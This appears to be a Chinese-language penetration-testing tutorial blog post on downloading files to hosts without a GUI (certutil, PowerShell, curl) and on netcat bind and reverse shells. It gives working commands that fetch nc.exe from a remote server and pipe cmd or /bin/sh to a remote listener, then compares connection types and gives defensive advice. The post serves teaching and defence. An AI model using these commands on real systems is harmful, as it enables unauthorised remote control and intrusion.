当前位置: 首页 > article >正文

010501上传下载_反弹shell-渗透命令-基础入门-网络安全

文章目录

    • 1 上传下载
    • 2 反弹shell命令
      • 1. 正向连接(Forward Connection)
        • 正向连接示例(nc)
      • 2. 反向连接(Reverse Connection)
        • 反向连接示例(反弹 Shell)
      • 对比表格
      • 实际应用中的选择
      • 防御建议
      • 总结
      • 结语

1 上传下载

解决问题:无图形化、数据传输。

案例演示:参考连接1命令在windows与linux之间相互下载文件,文件nc.exe放置在linux web网站根目录下

命令生成:参考下面连接1

Linuxwget,curl,python,ruby,perl,java

windowsPowerShell,Certutil,Bitsadmin,msiexec,mshta,rundll32

windows下载测试1:

certutil.exe -urlcache -split -f http://ip:port/nc.exe nc1.exe

如下图所示:在这里插入图片描述

windows下载测试2:

powershell.exe -Command "Invoke-WebRequest -Uri http://ip:port/nc.exe -OutFile nc2.exe"

如下图所示:在这里插入图片描述

linux下载测试1:

curl http://ip:port/nc.exe -o nc1.exe

如下图所示:在这里插入图片描述

2 反弹shell命令

反弹 Shell(Reverse Shell)是一种网络技术,通常用于通过远程控制的方式连接目标计算机。

解决问题:数据回显、数据通讯。

命令生成:https://forum.ywhack.com/shell.php

正向连接和反向连接是网络通信中两种不同的连接方向模式,尤其在渗透测试、远程控制等场景中常被讨论。以下是它们的核心区别和应用场景:


1. 正向连接(Forward Connection)

  • 定义:客户端主动连接服务器(攻击者→目标)。
    示例:常规的 SSH 登录、访问网站、下载文件等。
  • 特点
    • 客户端主动发起请求,服务端监听端口等待连接。
    • 依赖条件:目标机器(服务端)需开放端口且允许入站流量(如防火墙放行)。
  • 典型应用场景
    • 正常服务访问(如 Web 服务、数据库连接)。
    • 渗透测试中直接连接目标开放的服务(如爆破 SSH 弱口令)。
正向连接示例(nc)

linux控制windows

  • windows绑定cmd到本地5566端口

    nc -e cmd -lvp 5566
    
  • linux主动连接目标5566

    ncat 192.168.0.104 5566
    

如下图所示:

在这里插入图片描述

window控制linux

  • linux绑定sh到本地5566端口

    ncat -e /bin/sh -lvp 5566
    
  • window主动连接linux5566端口

    nc 192.168.0.105 5566
    

如下图所示:

在这里插入图片描述


2. 反向连接(Reverse Connection)

  • 定义:服务端(目标)主动连接客户端(攻击者)。
    示例:反弹 Shell、木马回连控制端。
  • 特点
    • 服务端(目标)主动向外发起连接,客户端(攻击者)监听端口等待连接。
    • 依赖条件:攻击者需开放监听端口,且目标允许出站流量(通常防火墙对出站限制较少)。
  • 典型应用场景
    • 绕过防火墙或 NAT 限制(如内网机器无法直接暴露端口)。
    • 渗透测试中维持权限(通过反向通道控制目标)。
反向连接示例(反弹 Shell)

windows反向连接linux:

  • linux开启监听5566

    ncat -lvp 5566
    
  • windows给linux连接

    nc -e cmd 192.168.0.105 5566
    

如下图所示:

在这里插入图片描述


对比表格

特性正向连接反向连接
连接方向客户端→服务端服务端→客户端
防火墙限制依赖目标开放入站端口依赖目标允许出站流量
典型场景正常服务访问、直接攻击绕过防火墙、权限维持
攻击者角色主动连接目标被动监听,等待目标回连
风险防御限制入站端口监控异常出站连接

实际应用中的选择

  1. 正向连接适用场景
    • 目标机器有公网 IP 且开放端口。
    • 直接利用漏洞攻击开放服务(如 Web RCE)。
  2. 反向连接适用场景
    • 目标处于内网,无法直接访问(如 NAT 环境)。
    • 防火墙阻止入站流量但允许出站(如企业内网主机)。

防御建议

  • 正向连接防御
    • 限制非必要端口的入站规则(如仅开放 80/443)。
    • 使用强密码和双因素认证(防止爆破)。
  • 反向连接防御
    • 监控异常出站连接(如非业务 IP 的主动外连)。
    • 限制出站流量(仅允许访问白名单 IP/端口)。
    • 部署 EDR/XDR 检测反弹 Shell 行为。

总结

  • 正向连接:直接、简单,但依赖目标环境开放入站权限。
  • 反向连接:隐蔽、灵活,常用于绕过网络限制,但需依赖目标的出站策略。

结语

❓QQ:806797785

⭐️仓库地址:https://gitee.com/gaogzhen

⭐️仓库地址:https://github.com/gaogzhen

[1]全栈网络安全 | 渗透测试 | 高级红蓝对抗 V2024最新版[CP/OL].

[2]棱角社区[CP/OL].

http://www.lryc.cn/news/2391630.html

相关文章:

  • Flask集成Selenium实现网页截图
  • 机顶盒CM311-5s纯手机免拆刷机,全网通,当贝桌面
  • 知识图谱:AI时代语义认知的底层重构逻辑
  • centos7安装MySQL(保姆级教学)
  • 2025.5.23 【ZR NOI模拟赛 T3】高速公路 题解(容斥,高维前缀和,性质)
  • QGIS新手教程2:线图层与多边形图层基础操作指南(点线互转、中心点提取与WKT导出)
  • nova14 ultra,是如何防住80°C热水和10000KPa水压冲击的?
  • Spring Boot项目中实现单点登录(SSO)完整指南
  • Windows环境下Redis的安装使用与报错解决
  • 鸿蒙完整项目-仿盒马App(一)首页静态页面
  • 大模型(4)——Agent(基于大型语言模型的智能代理)
  • 39-居住证管理系统(小程序)
  • WPF【11_4】WPF实战-重构与美化(MVVM 架构)
  • 计算逆时针夹角(有向角度)——CAD c# 实现两条线(向量)的逆时针夹角
  • 鸿蒙OSUniApp 开发带有通知提示的功能组件#三方框架 #Uniapp
  • 前端EXCEL插件智表ZCELL数据源功能详解
  • 打卡第31天:模块和库的导入
  • LLM Coding
  • Qt 的多线程
  • 【请关注】各类MySQL数据备份还原分享
  • Go语言方法与接收者 -《Go语言实战指南》
  • 基于 STM32 的农村污水处理控制系统设计与实现
  • 【Linux】进程 信号的产生
  • 实时操作系统革命:实时Linux驱动的智能时代底层重构
  • NGINX HTTP/3 实验指南安装、配置与调优
  • 机器学习中的维度、过拟合、降维
  • 关于git的使用
  • 预约按摩小程序源码介绍
  • Elasticsearch创建快照仓库报错处理
  • LINUX安装运行jeelowcode前端项目